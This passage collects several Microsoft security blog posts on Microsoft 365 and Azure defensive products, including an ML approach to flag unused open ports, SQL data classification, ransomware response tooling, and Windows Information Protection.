The Respond Function provides guidelines for effectively containing a cybersecurity incident once it has occurred through development and execution of an effective incident response plan.

Microsoft 365 security solutions directly support the Response Planning category based on a variety of visibility reports and insights. Azure AD Access and Usage reports allow you to view and assess the integrity and security of your organizations implementation of Azure AD. With this information, you can better determine where possible security risks may lie and adequately plan to mitigate those risks. These reports are also used for event Mitigation including anomaly reports, integrated application reports, error reports, user-specific reports, and activity logs that contain a record of all audited events within the last 24 hours, last 7 days, or last 30 days. Supporting the Analysis category, Microsoft offers guidance and education on Windows security and forensics to give organizations the ability to investigate cybercriminal activity and more effectively respond and recover from malware incidents.

Want to Learn More?

For more information and guidance on assessing Microsoft 365 security solutions using the NIST CSF, check out the whitepaper.

Deployment Tip:For more help with Microsoft 365 security, consider FastTrack for Microsoft 365. Whether youre planning your initial Microsoft 365 Security rollout, need to onboard your product, or want to drive end user adoption, FastTrack is your benefit service and is ready to assist you. Get started at FastTrack for Microsoft 365.

* Although Microsoft offers customers some guidance and tools to help with certain the fifth Recover function (data backup, account recovery), Microsoft 365 doesnt specifically address this function. Note also that Microsoft isnt endorsing this NIST framework – there are other standards for cybersecurity protection – but we find it helpful to baseline against commonly used scenarios.

More blog posts from this series:

Categories: Uncategorized Tags:

The need and opportunity for adaptive prevention in the cloud

This post is authored by Michael Bargury, Data Scientist, C+E Security.

The need

The cloud introduces new security challenges, which differ from classic ones by diversity and scale. Once a Virtual Machine (VM) is up and running with an open internet port, it is almost instantaneously subject to vulnerability scanning and Brute Force (BF) attacks. These attacks are usually not directed at a specific organizations environment. Instead, they cover a broad range of environments, hoping to infiltrate even a small fraction of them, to be used for their computational power or as part of a botnet.

The agile nature of the cloud allows organizations to build elaborate and highly customized environments. These environments constantly change, as customers utilize the clouds ability to adapt to variations in computational or network communication demands. Although this agility is one of the clouds top offerings, it also makes it harder to apply and maintain security best practices. As your environment changes, the security measurements needed to protect it might change as well. Moreover, while security experts can manually analyze common environment scenarios and offer security recommendations, the huge diversity in the cloud renders these recommendations useless for many organizations, which requires more tailor-suited solutions.

Proper security recommendations have the potential to make a huge impact on an organizations security. They can minimize attack surface, essentially blocking attacks before they occur.

The opportunity

On the other hand, the cloud provides unique opportunities, which are impossible or impractical for most organizations on their own. The broad visibility and the diversity of environments allow statistical models to detect abnormal activities across the cloud. Organizations can anonymously share their security-related data with trusted 3rd parties such as Azure Security Center (ASC), which can leverage this data to provide better detection and security recommendations for all organizations. Essentially, the cloud allows organizations to combine their knowledge in a way, which is much larger than the sum of its parts.

Leveraging these cloud-unique opportunities gives birth to a whole new world of customized security recommendations. Instead of a single one-fits-all best practice, the cloud allows customized best practices to be generated and updated constantly, as a cloud environment is built and evolved. Imagine an agent, which detects a security risk associated with a machine placed under the wrong subnet, or an automatically updating firewall.


Let us dive into a very basic, yet typical scenario. As a developer in a cloud-based organization, I would like to deploy a new SQL-Server on Windows. I deploy a new Windows VM, install SQL-Server and create an inbound rule in my Network Security Group (NSG) to allow for incoming communication in port 1433.

A few months later, the SQL-Server had long been deleted. The VM is being used for something else entirely. The only thing left from my initial deployment is the inbound rule on port 1433, which has been forgotten by the individual who deleted the SQL-Server. This leaves an opening for malicious intenders to gain access to my machine, or simply to cause an overuse of resources by bombarding it with requests. After a while, I get a security alert from ASC. There was a successful BF attack on my machine, and it is now compromised. Looking at the logs, I see that the attack was carried through port 1433.

A good security recommender system would have identified that port 1433 is no longer in use by SQL Server, and prompt me with a recommendation to close it before the machine was compromised.

Learning scenario

Taking the perspective of a cloud provider, we will now devise a way to detect the scenario mentioned above and recommend a mitigation on time.

We can safely assume that most Azure customers use port 1433 for SQL-Server communication, as it is the default port used in SQL-Server software. This reduces our problem to the following goal: find machines with an inbound rule for port 1433, which do not run SQL-Server software.

But wait, how do we know which SQL-Server software to look for the absence of? We can try to manually devise a list of executables with underline SQL-Server, but there must be a better way.

Remember, we have assumed that most Azure customers use port 1433 for SQL-Server communication. Utilizing this assumption, we can learn which executable is unusually common in machines with an inbound rule on port 1433, out of the entire population of Azure VMs.

And so, our final goal becomes: find machines with an inbound rule for port 1433, which do not run common executables within this group.

We can try to reach this goal in several ways. We can take a classification approach. We use two weeks of executable executions, from 30K Azure machines that use ASCs monitoring agent.

First, we devise a list of distinct executables. We are looking for executables of a very common software so we can filter the list by executables that run in more than 10 Azure VMs, to reduce noise. This leaves us with 4,361 distinct executables.

We represent each Azure VM as a vector of indicators of executables run by that VM. For example, consider A, which ran only a single executable. That VM would be represented by zero-vector, with a single coordinate containing a one, which represents that executable. Next, we label each VM by whether or not it has port 1433 open for inbound traffic.

We will treat our dataset as a classification problem: given a binary feature vector for each VM, predict whether its port 1433 is open for inbound traffic. Notice that we already know the answer to this question. Therefore, we will be able to measure the accuracy of our model.

We train a Random Forest (RF) model to solve the classification problem. We use an RF for multiple reasons. First, it forces the model to only consider a small subset of features, which corresponds to a small number of executables which we hope would be SQL-Server related. Second, allowing only a few trees in the RF will yield a simple classification model, easily interpretable and understandable.

To avoid overfitting, we use hypothesis validation. We split our dataset 70-30 percent to train-test dataset. We train the model on the training set and measure its performance on the test set.

// Error = (# wrong classifications) / (# samples)

Train error = 0.00095

Test error = 0.00128

The model performs very well, with low classification error both for the train and test sets.

Lets think about what happened here. The model was able to accurately predict whether a VM has an inbound rule for port 1433, using a small list of executables ran by that VM. This implies that there is some set of executables, which are extremely common among VMs which can be addressed on port 1433. To examine these executables, we can look at the top ten features by importance (significance to classification) provided by our classifier:

  1. \\program files\\microsoft sql server\\mssql_ver.mssqlserver\\mssql\\binn\\sqlagent.exe

  2. \\program files\\microsoft sql server iaas agent\\bin\\ma\\agentcore.exe

  3. \\packages\\plugins\\microsoft.compute.vmaccessagent\\version\\bin\\jsonvmaccessextension.exe

  4. \\program files\\microsoft sql server iaas agent\\bin\\sqlservice.exe

  5. \\program files\\microsoft sql server\\mssqlmssqlserver\\mssql\\binn\\databasemail.exe

  6. \\windows\\\\framework\\version\\ngen.exe

  7. \\program files (x86)\\microsoft sql server\\version\\tools\\binn\\sqlexe

  8. \\packages\\plugins\\microsoft.sqlmanagement.sqliaasagent\\version\\sqliaasextensiondeployer.exe

  9. \\packages\\plugins\\microsoft.enterprisecloud.monitoring.microsoftmonitoringagent\\version\\mmaextensionheartbeatservice.exe

  10. \\program files\\microsoft sql server\\mssqlmssqlserver\\mssql\\binn\\fdhost.exe

This is excellent. Our model found that the best indicators for port 1433 being open, is having SQL-Server related executables running on the VM. This validates our assumption that most Azure customers use port 1433 for SQL-Server communication! Otherwise, our model wasnt able to get such high accuracy scores by using SQL-Server executables as features.

Returning to our initial goal we are looking for machines which do not run executables which are very common within this group. For these machines, there is no way the model can detect that their port 1433 is open, judging from SQL-Server related executables. Hence, these machines should correspond with our models classification errors! More specifically, we are looking for false negatives (FN, the model wrongly classifies the VM to have a closed port 1433).

Let’s examine one of these VMs. Here is its list of ran executables:

  1. \windows\softwaredistribution\download\install\: [exe, windows-ver-delta.exe]

  2. \windowsazure\guestagent_ver\collectguestlogs.exe

  3. \program files\microsoft security client\mpcmdrun.exe

  4. \windows\servicing\trustedinstaller.exe

  5. \windows\winsxs\amd64_microsoft-windows-servicingstack_ver\tiworker.exe

  6. \program files\microsoft office 15\clientx64\officec2rclient.exe

  7. \program files\java\: [jre_ver\bin\jp2launcher.exe, 8.0_144\bin\javaws.exe]

  8. \program files (x86)\common files\java\java update\jucheck.exe

  9. \windows\\framework64\ver\: [exe, ngen.exe]

  10. \windows\\framework\ver\: [exe, ngentask.exe]

  11. \windows\system32\inetsrv\w3wp.exe

  12. \windows\system32\wbem\: [exe, wmiprvse.exe]

  13. \windows\system32\: [taskhostex.exe, mrt.exe, schtasks.exe, taskeng.exe, wsqmcons.exe, rundll32.exe, sc.exe, lpremove.exe, mpsigstub.exe, ceipdata.exe, defrag.exe, sppsvc.exe, cmd.exe, conhost.exe, svchost.exe, aitagent.exe, taskhost.exe, mrt-ver.exe, sppextcomobj.exe, wermgr.exe, werfault.exe, tzsync.exe, slui.exe]

Indeed,we dont see SQL-Server here! Actually, it seems like this VM is running mostly Windows/Azure updates. We can issue a recommendation for this VM to remove its inbound rule for port 1433. Looking at past ASC alerts, we can see that this machine was brute forced on six different days, providing valuable attack surface to malicious intenders. Our model can put an end to that!

Overall, we found five machines which might have port 1433 open for no reason (FN of the classification model).


Now that we have a working model and a nice Proof of Concept, we might consider applying it for similar scenarios. After all, why focus only on port 1433 and SQL-Server, when our model didnt depend on either of these as an assumption.

We can generalize our scenario and solution to the following:

  • Goal: find machines with an inbound rule for port X, which do not run executables which are very common within this group.
  • Method: Train an RF to predict whether or not a machine has port X open for inbound traffic, based on the executables ran. Output the machine that was misclassified by the RF.


The scenario developed above is only the tip on the iceberg. The Azure Security Center (ASC) team is working hard on providing adaptive prevention capabilities, to enable better security for Azure customers. For information about the first adaptive prevention feature in ASC, see How Azure Security Center uses machine learning to enable adaptive application control. To learn about the use of Machine Learning in ASC, see Machine Learning in Azure Security Center.

Categories: Uncategorized Tags:

New FastTrack benefit: Deployment support for Co-management on Windows 10 devices

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog Getting the most value out of your security deployment.

We are pleased to announce that FastTrack for Microsoft 365 (a benefit of your Microsoft 365 subscription for planning, deployment and adoption), now provides deployment support for Co-management on your Windows 10 devices. Id like to provide a few highlights on what you can expect.

What is Co-management?

Co-management is the integration between Configuration Manager and Microsoft Intune that enables a Windows 10 device to be managed by Configuration Manager and Intune at the same time. This provides you with an opportunity to enable remote actions that can be taken on the device, like remote factory reset or selective wipe for lost or stolen devices. Some additional advantages include conditional access, enabling you to ensure devices accessing your corporate network are compliant with your company policies and requirements. And, with your Windows 10 device you have Windows AutoPilot which is automatic enrollment that enrolls devices in Intune. This can let you lower your provisioning costs on new Windows 10 devices from the cloud. Co-management empowers you to complement Configuration Manager with Intune and more easily bring all this together where cloud makes sense for your organization as seen in Figure 1 below.

Figure 1: Co-management architecture

What can you expect

As part of our deployment support, the FastTrack team will provide guidance on the following activities:

  • Enabling Active Directory auto enrollment
  • Enabling hybrid Azure Active Directory
  • Enabling the Cloud Management Gateway
  • Enabling Co-management in Configuration Manager
  • Switch over supported device management capabilities from Configuration Manager to Intune:

    • Device conditional access policies
    • Resource Access profiles
    • Windows Update for Business policies
    • EndPoint Protection policies

  • Setting up Intune to deploy the Configuration Manager agent to new devices

FastTrack for Microsoft 365 benefits

FastTrack continues to invest in bringing you end to end services for planning, onboarding and driving adoption of your eligible subscriptions, and comes at no additional charge. It is our commitment to help you to realize the value of your Microsoft 365 investment with a faster deployment and time to value.

FastTrack lets you engage with our FastTrack specialists and provides best practices, tools and resources to help you quickly and easily enable Microsoft 365 in your environment, now including co-management for Windows 10 devices.

Get started

To request assistance from FastTrack, you can get started by going to our FastTrack website. Click on the Sign In prompt, and enter your company or school ID. Go to the dashboard, and from there follow the prompts to access the Request for Assistance form. Your submission will be reviewed and routed to the appropriate team that will address your specific needs and eligibility.

The FastTrack website also provides you with best practices, tools, and resources from the experts to help make your deployment experience with the Microsoft Cloud a great one.

More blog posts from this series:

Categories: Uncategorized Tags:

Updating your cybersecurity strategy to enable and accelerate digital transformation

This post is authored by Cyril Voisin, Cheif Security Advisor, Enterprise Cybersecurity Group.

Nowadays every company is becoming a digital company to some extent. Digital transformation changes the way business is done. For example, it puts more control into the hands of employees, who now demand anytime, anywhere connectivity to the solutions and data they need to accomplish their objectives. Adoption of digital technologies takes place at every level of the organization, and shadow IT reminds us that employees may procure their own IT solutions to be more productive. Solutions require careful security considerations before being approved. Therefore, its important to redefine your strategy to support both security and productivity, based on sound risk management.

Over the last decade, the security landscape has changed dramatically. Therefore, the security approach must be adapted to a new world of constant change and massive digitalization. With dramatic events such as Wannacry or NotPetya, cybersecurity has become a board conversation. Savvy enterprises now consider cybersecurity risks as strategic, the same way they consider financial risks.

Defining a crisp modern security strategy to support business success

A modern security agenda needs to define the purpose of the security team, its vision and mindset. It should also explain the high-level strategies it will employ, and how it will be organized, including the definition of priorities and deadlines and how the results will be measured. The figure below shows an example of a modern security agenda that can be summarized in a single slide for the purpose of sharing with your executive team.

Download the whitepaper on cybersecurity for digital transformation

More detailed information regarding enabling and accelerating digital transformation is available in this whitepaper. It is designed to articulate what a modern security strategy can look like, and is useful for CISOs, CIOs, CDOs, and potentially board members who want to learn more about secure transformation and benchmark their own teams. It was first released as an exclusive distribution in Dubai in October 2017, and now we are making it more broadly available today.

You can download the whitepaper here.

For more information on deployment planning and FastTrack guidance,check out related deployment series blogs.

Categories: Uncategorized Tags:

Getting the most value out of your security deployment

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog Now that you have a plan, its time to start deploying.

In our previous blog, we covered some of the tactical issues that youll want to consider planning your Microsoft 365 Security deployment. Now well move to the third and final step of an effective planning process: Drive Value.

The Drive Value stage is about helping your employees to embrace and adopt the new tools and processes that are a part of your new Microsoft Security infrastructure.

The FastTrack team can help you create and implement an adoption plan that leads you and your team smoothly out of the test phase and into wider user adoption. Drawing from thousands of customer experiences, weve assembled a variety of proven engagement tactics that you can apply directly to your own rollout. Well make sure you have the knowledge, support, and materials you need for success.

Your checklist to Drive Value

The following checklist provides some of the items and actions that our FastTrack team can help you with you during the Drive Value step:

Implement the adoption plan

  • Going beyond your test group to a broader population of users can be difficult. Having a plan in place to help your users adopt and embrace change will make this easier. Microsoft FastTrack will help you build a multifaceted adoption plan using best practices.

Hold launch and training events

  • Make it informative and fun using Microsoft FastTrack resources to help you drive end-user adoption. One idea is to set up a booth or a kiosk outside your lunch area or host lunch and learn events for your users. These events serve to support your users with face-to-face questions & answers as well as driving excitement and adoption. They are a great way to distribute resources your users can take with them.

Encourage ongoing engagement

  • As you implement the adoption plan, FastTrack will monitor and assist you at designated points along the way. Together, youll work with your internal business stakeholders to drive adoption of new technology and work out any productivity issues. Leveraging the Service Management Toolkit and the Admin Learning Center helps you stay informed and effectively manage the new environment

Keep everyone informed: provide an FAQ and supporting materials

  • Microsoft FastTrack has templates you can send to your users to educate them about specific features, explain deployment within the organization, how they can register and enroll, and more. These tools and guides are specifically geared toward different departments within your organization, including individuals in HR, R&D, finance, legal, IT, and sales. You can also work with your internal communications teams to develop appropriate supporting collateral.

Ready to take the next step? Start your success plan

Our FastTrack Success Plan is an online tool that walks you through each step of Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack at:

FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

More blog posts from this series:

Categories: Uncategorized Tags:

Data classification and protection now available for structured data in SQL

This post is authored by Gilad Mittelman, Senior Program Manager, SQL Data Security.

Data privacy and data security have become one of the most prominent topics in organizations in almost every industry across the globe. New regulations that formalize requirements are emerging around these topics and compel organizations to comply.

The upcoming EU Global Data Protection Regulation (GDPR), which takes effect on May 25, 2018, is one of the most noteworthy of these new regulations. It sets a new global bar for privacy rights, security, and compliance, mandating many requirements and obligations on organizations across the globe. Complying with this regulation will necessitate significant investments in data handling and data protection for a very large number of organizations.

GDPR and Microsoft SQL

SQL Information Protection (SQL IP), now in public preview, complements the existing Microsoft Information Protection (MIP) unstructured data classification framework (Azure Information Protection, Microsoft 365) and extends it with new structured data classification capabilities.

Microsoft SQL customers who are subject to the GDPR, whether managing cloud-based or on-premises databases or both, will need to ensure that qualifying data in their database systems is aptly handled, protected and monitored according to GDPR principles. This means that many customers will need to review or modify their database management and data handling procedures, especially focusing on the security of data processing as stipulated in the GDPR the first step in this journey to compliance is discovering and tagging where such sensitive data resides within the database environment.

SQL IP introduces advanced capabilities built into Azure SQL Database and SQL Server for discovering, classifying, labeling and protecting the sensitive data in your SQL databases.

Discovering and classifying your most sensitive data (business, financial, healthcare, PII, etc.) can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

  • Helping meet data privacy standards and regulatory compliance requirements, such as GDPR.
  • Data-centric security scenarios, such as monitoring (auditing) and alerting on anomalous access to sensitive data.
  • Controlling access to and hardening the security of databases containing highly-sensitive data.

What is SQL Information Protection?

SQL IP introduces a set of advanced services and new SQL capabilities, forming a new information protection paradigm in SQL aimed at monitoring and protecting the data, not just the database:

  • Discovery and recommendations A built-in classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you an effortless way to review and apply the appropriate classification recommendations via the Azure portal or via SQL Server Management Studio.
  • Labeling Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
  • Monitoring/Auditing Sensitivity of the query result set is calculated in real time and used for auditing access to sensitive data. Additional logic can then be applied on top of the audit logs, for identifying and alerting on anomalous access to sensitive data, data extraction of large volumes of PII, etc.
  • Visibility – The database classification state can be viewed in a detailed dashboard in the portal as seen in Figure 1 below. Additionally, you can download a report (in Excel format) to be used for compliance & auditing purposes, as well as other needs.

Figure 1: Data discovery and classification dashboard

SQL Information Protection in action demo video

The following video demonstrates the main SQL Information Protection public preview capabilities for Azure SQL DB and SQL Server:

What’s next?

Additional SQL IP capabilities will continue rolling out throughout the upcoming year, with a focus on scale and automation.

Well be introducing centralized management via Azure Security Center, enabling organizations to customize the organizational information protection policy with proprietary labels and discovery (recommendations) logic enrichment. Well also be introducing centralized dashboards for visibility into the sensitivity state of all resources across the entire database estate.

In addition, various automation capabilities will be exposed, for supporting fully automated classification and labeling of large numbers of databases at scale.

We encourage customers to contact us with any questions or feedback at

Additional resources on SQL Information Protection

More details on using SQL Information Protection can be found in:

Categories: Uncategorized Tags:

Partnerships power the future of better security

This post is authored by Jeremy Dallman, Principal Program Manager.


Our goal in building the Microsoft Graph Security API is to enable customers to share insights and take action across security solutions to improve protection and speed response. By creating a connected security ecosystem, Microsoft and partners can enable developers to simplify integration and alert correlation, unlock valuable context to aid investigation, and streamline security operations.

Palo Alto Networks shares the vision of enabling better integration to benefit our joint customers. They are a member of Microsoft Intelligent Security Association and as part of the Graph Security API launch at RSA, we showcased an application that demonstrated the power of integration between multiple Microsoft and Palo Alto Networks security offerings. We demonstrated how a Palo Alto Networks provider for the Security Graph can prevent successful cyberattacks by correlating alerts from Microsoft with its threat intelligence, firewall logs, and automated firewall policy changes.

Microsoft Graph Security API proof of concept integration using PowerBI

Our close collaboration continues and this week at the Palo Alto Networks user conference, Ignite 2018, we will unveil the latest joint innovation. Microsoft and Palo Alto Networks have worked to connect the Microsoft Graph Security API and the Palo Alto Networks Application Framework with a provider that brokers interactions between the two platforms. We will also demo a Microsoft PowerBI solution that accesses information from both the Palo Alto Networks Application Framework and the Microsoft Graph Security API giving our customers the ability to query and access all of their security data through a common interface.

For those attending Ignite this week, be sure to join the Wednesday (5/23) 4:00PM session where Jason Wescott and Francesco Vigo will discuss the collaboration between Microsoft Graph Security API and the Palo Alto Networks Application Framework. If you arent at Ignite, visit the Graph Security API documentation or sign up to request access to the Palo Alto Networks Application Framework API to start exploring how you can take advantage of this powerful collaboration!

Categories: cybersecurity, Security Development Tags:

Now that you have a plan, it’s time to start deploying

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog First Things First: Envisioning Your Security Deployment.

In our previous blog post, we covered how FastTrack for Microsoft 365 can help you envision a successful Microsoft 365 security deployment. Now, well cover the next phase of our three-phase planning approach: Onboard. This is where you move from strategy and objectives to the practical details of your deployment planning.

The Onboard phase is a critical time to remove any blockers you have, clean up any issues that might prevent your preferred deployment approach, and then start setting up services and users that integrate with your environment. The FastTrack team can help coordinate the setup, configuration, and provisioning of many of your Microsoft 365 services.

We will cover how to Drive Value with FastTrack for Microsoft 365 in our next blog. But first

Your onboard checklist

The following checklist provides some of the items and actions that our FastTrack team can help you work through during the Onboard phase:

Network and Client

  • Identify and prepare DNS, network, and infrastructure needs
  • Configure DNS for eligible services
  • Configure TCP/IP protocols and firewall ports
  • Identify and prepare client needs (Internet browser, client operating system, and services’ needs)
  • Enable eligible services that have been purchased and defined as part of onboarding
  • Establish the timeline for remediation activities
  • Activate your Microsoft online service tenant or subscription
  • Validate connectivity to Microsoft online services


  • Provision user identity including licensing
  • Configure Azure AD Identity Protection
  • Configure Self Service Password Reset (SSPR)
  • Configure Azure Multi-Factor Authentication
  • Configure Privileged Identity Management
  • Set up Azure AD Conditional Access policies
  • Synchronize Azure AD Connect directory (with password writeback and password hash sync)

Access Management

  • Configure identities to be used by Intune, by either leveraging your on-premises Active Directory or cloud identities (Azure AD)
  • Add users to your Intune subscription, define IT admin roles (Helpdesk operator, admins, etc.), and create user and device groups
  • Configure and deploy Intune app protection policies for each supported platform and prepare line-of-business apps for app protection policies

Mobile Device Management (MDM)

  • Configure your MDM authority and policies and test to validate MDM management policies
  • Configure profiles on devices for supported platforms
  • Enroll devices of each supported platform to Intune or Configuration Manager with Microsoft Intune service

Ready for action? Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value and adoption with users.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

More blog posts from this series:

Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 4

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Responding to ransomware in the Modern Workplace

Over the last few weeks, we have shared the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect against and detect a modern ransomware attack. Today, we conclude our blog series by discussing how Microsoft 365 threat protection can help respond to attacks and also helps educate and raise awareness of threats to end users. In our ransomware scenario, once the threat has been detected, Microsoft 365 also helps respond and remediate with automation playing a key role in making the response more manageable, accurate, and less time consuming for administration. Microsoft 365 threat protection response and remediation services are shown in figure 1 below.

Ransomware Detection with Microsoft 365
Windows Defender Advanced Threat Protection
Azure Advanced Threat Protection
Microsoft Cloud App Security
Azure Security Center
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

In our ransomware scenario, Windows Defender Advance Threat Protection (WDATP) alerts security operations teams about suspicious activities such as programs launching self-replicating copies. If the ransomware does manage to infect multiple devices, WDATP automatically investigates alerts, applies artificial intelligence to determine whether a threat is real and then decides what action to take. It then automatically remediates the threat from affected endpoints to stop further damage as shown in figure 2.

Figure 2. WDATP automation mapping the propagation of a threat

WDATP provides manual machine level responses, such as isolating a machine to contain the threat. Further, forensic data is collected to better understand the attack and the attacker. WDATP also includes file level response by quarantining or blocking malicious files. Azure Security Center also leverages automation by helping orchestrate these common security workflows:

  • Routing alerts to a ticketing system
  • Applying additional security controls
  • Gathering additional information
  • Asking a user to validate an action
  • Blocking a suspicious user account
  • Restricting traffic from an IP address

Azure Security Center employs behavioral analytics to uncover patterns and malicious activity to enable proactive policies to be set in place to help prevent impact from future attacks. Response times are also improved with expanded signal from Azure Security Centers 3rd party integrations with firewalls and anti-malware engines. While Azure Security Center enables security operations personnel to respond to threats to the enterprise infrastructure, admins can quickly respond to threats to user identities by creating activity policies with Microsoft Cloud App Security (shown in figure 3) which can take the action of suspending a user account when the predefined conditions are met. In our example, the ransomware propagates using the brute force password technique which requires multiple logins, thus login failures from a unique account are likely and this can be a trigger for Microsoft Cloud App Security to suspend an account. One of the powerful benefits of Microsoft Cloud App Security is that it extends protection beyond the Microsoft ecosystem. Even if login attempts are made from popular enterprise applications that are not Microsoft client apps, Microsoft Cloud App Security enables admins to respond to the anomalous activity.


Figure 3. Microsoft Cloud App Security General Dashboard

In Microsoft 365, threat response and remediation is offered with Office 365 Threat Intelligence. Using the Threat Explorer feature, security analysts and administrators can search for all instances of potentially malicious emails that may contain ransomware. The back-end is designed for efficient threat investigation and remediation. Emails that are part of a ransomware campaign can easily be discovered using a variety of search filters with the Threat Explorer shown in figure 4. The admin can select all the emails that need to be investigated from a specific sender and choose to take immediate action on potentially malicious emails including: move to junk, move to deleted items, soft delete, hard delete, and move to inbox. Choosing the delete action purges the malicious emails from all tenant mailboxes. There is also the option of creating an incident so that a manager must approve the action.

Figure 4. Office 365 Threat Explorer email remediation actions

Educating end users about ransomware in the modern workplace

We discussed cyber education as an important element for protecting organizations. Having end users who are prepared and informed on spotting potential cyber attacks is a powerful manner to preventing attacks from harming an organization. Attack Simulator, shown in figure 5, is a new feature of Office 365 Threat Intelligence currently in public preview. Among several simulations is the Display Name Spear Phishing Attack. Spear phishing is a subset of phishing, aimed at a specific group, individual, or organization and as we discussed before, a method of spreading ransomware. Attack Simulator harnesses signal from Office 365 Threat Intelligence which provides visibility into an organizations most targeted and potentially most vulnerable users and enables admins to launch simulated threats targeting those very same users. This provides the most targeted users with training on recognizing phish emails which include ransomware and provides admins visibility on how those users behave during an attack, enabling optimal policy updates and security protocols.

Figure 5. Attack Simulator UI

Since the attack surface of the modern workplace is complex and broad, Attack Simulator will begin to offer simulated attacks made through other attack vectors as it moves from preview to GA. Attack Simulator will help raise user awareness and effectiveness at spotting attacks from all the common attack vectors.

Microsoft 365 threat protection

Microsoft has heavily invested in helping secure our customers for many years by building security in our products from the ground up. In the last few years, as the level of cybercrime has increased, we have also increased our efforts and focus on developing and continuously updating advanced security solutions to protect customers from a wide variety of threats and types of attack. In this ransomware scenario, you see as an example, our continued focus on security which provides end users ultimate protection from modern threats, while giving administrators a powerful set of tools to help protect, detect, respond and even educate against these threats. Threat protection is only one key aspect of Microsoft 365. Learn more about Microsoft 365 and understand how it can help your organization through its digital transformation journey. Additionally, follow the links below to learn more about the Microsoft 365 threat protections services and experience them by starting a trial.

Categories: Uncategorized Tags:

Use Windows Information Protection (WIP) to help make accidental data leakage a thing of the past

Have you always wished you could have mobile application management (MAM) on Windows?

Now you can!

Windows Information Protection (WIP) is an out-of-the box data leakage prevention feature for Windows 10 that can automatically apply protection for work files and data to prevent accidental data leakage. With 600 million active Windows 10 devices, corporate customers continuing to deploy in earnest throughout 2018, and support for WIP built right into Office 365 ProPlus, its benefits are within easy reach.

Sixty to eighty percent of data leakage is accidental (see ICO data for 2016 and 2017). WIP is a key feature that offers much needed data protection for files at rest on the Windows platform, for any organization with sensitive data, big or small. In todays security ecosystem, companies are spending $93B on security features (enough to host seven Olympic Games!). Yet companies still saw a 29 percent increase in data leakage worldwide between 2016 and 2017. WIP comes as a timely solution.

With Windows 10, Microsoft is providing a fundamental solution to this growing problem. Recognizing that the risk of leak comes from both fully managed devices and personal devices accessing work resources, we designed WIP to be deployed on PC and mobile devices running Windows 10. WIP is designed for organizations of all shapes and sizes, as a scalable solution that works to prevent accidental data leakage for end users.

WIP protects users and organizations from accidental leaks via copy-and-paste, drag-and-drop, removable storage (e.g., USB thumb drives), and unauthorized applications (e.g., non-work cloud storage providers). Windows shell integration appears in clear but unobtrusive ways. Elements like File Ownership are displayed and selectable in Explorer and File Save As dialog. Helpful briefcase icons mark resources when you are in a work context in places like window title bars, and Microsoft Edges navigation bar. Unauthorized applications are blocked from single sign-in with work credentials. WIP also includes the ability to perform selective wipe of business information, while leaving personal data behind.

WIP has three simple policy enforcement modes. It lets you choose how and whether the user experience in the clipboard, save dialog, and similar data-sharing cases have options (overrides) to move work content to non-work context. You can decide to Hide Overrides, Allow Overrides for your users, or even deploy in Silent mode just for auditing. Silent mode does not restrict unmanaged apps from opening work data the way Hide Overrides and Allow Overrides do, so you can get away with configuring less, yet still benefiting from the BYOD selective wipe capability for your work data, such as data downloaded from OneDrive for Business and Outlook email. This means when you or your user decides to unenroll their work account from their personal device, that work data stops being accessible.

WIP policy can be deployed in a few clicks in Microsoft Intune for MAM-only (without enrollment) targeting, MDM (with enrollment), or both. Being able to apply MAM-only policy will help you finally enable BYOD in regions and situations where fully managing the personal device is unacceptable. For companies that are not yet fully in the cloud, WIP policy can also be set on domain-joined computers using System Center Configuration Manager. Then, when youre ready for co-management, you can move the WIP policy management authority to Microsoft Intune.

Your corporate files can also be automatically encrypted with a local key when downloaded to WIP-managed devices. You can do this by configuring your corporate network boundary. Using network isolation policies, you can identify your LAN and corporate cloud resources, which Edge and other applications will use to recognize work sites and encrypt the data that comes from there. This works even better when combined with Conditional Access controls on Exchange Online and SharePoint Online to ensure that only managed devices can reach that data.

Additionally, WIP Learning lets you see the applications you didnt know are used with work data. It reports any app not in your policy that tries to access a work resource. You can see this data in Microsoft Intune or your Windows Analytics portal, if you have Azure Log Analytics (formerly Microsoft Operations Management Suite or OMS). WIP Learning allows you to tune your app policy to add legitimate work apps and even detect apps that should not be trying to access work data. Combined with Silent mode, you can deploy and see the immediate benefit of selective wipe control and auditing, while tuning your app list for different deployment groups in preparation for enabling boundary enforcement.

WIP provides a robust and automatic solution for protecting work data coming to the Windows device, but it also pairs well with Azure Information Protection (AIP). AIP adds the ability to control and help secure email, documents, and sensitive data that are shared, even outside your company and in the Azure cloud. WIP, combined with AIP, provides application-level access control capabilities while preventing unauthorized applications from accessing business information at rest and in flight. At the same time, WIPs simple business vs personal information classification system ensures simplicity and ease of use.

